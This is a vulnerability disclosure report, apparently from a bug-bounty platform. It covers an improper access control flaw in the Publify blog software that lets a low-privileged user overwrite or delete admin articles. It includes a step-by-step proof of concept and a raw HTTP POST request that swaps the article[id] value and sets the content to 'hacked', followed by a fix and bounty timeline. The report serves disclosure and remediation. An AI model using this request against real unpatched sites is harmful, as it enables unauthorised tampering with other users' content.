Improper Access Control - Articles in publify/publify

Valid

Reported on

May 20th 2022


Description

A low-privileged user can modify and delete admin articles just by changing the value of the article[id] parameter.

Proof of Concept

  • Step 1 - Authenticated as an unprivileged user, create a New article

  • Step 2 - Click Edit article

  • Step 3 - Intercept requests and Save your article

  • Step 4 - In the request that was intercepted, change the value of the article[id] parameter to the ID of admin article (You can get the id by copying the edit link of article)

  • Step 5 - Submit a request and the admin article will be hijacked.

POST /admin/content/5850 HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=cookie
Content-Length: 2234
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo-publify.herokuapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBydp1QV5GIbVRQBU
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
...
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[id]"

ID_ARTICLE_ADMIN_HERE
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[title]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[body_and_extended]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[keywords]"
...

Demo

https://drive.google.com/file/d/1OymOxmRG-B2p0DD0ZcFUyJiwx_k-NVGf/view?usp=sharing

Impact

An unprivileged user is allow to modify/delete admin's articles

We are processing your report and will contact the publify team within 24 hours. a month ago
We have contacted a member of the publify team and are waiting to hear back a month ago
publify/publify maintainer has acknowledged this report a month ago
Matijs van Zuijlen validated this vulnerability a month ago
Jonatas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matijs van Zuijlen confirmed that a fix has been merged on c0aba8 a month ago
Matijs van Zuijlen has been awarded the fix bounty
to join this conversation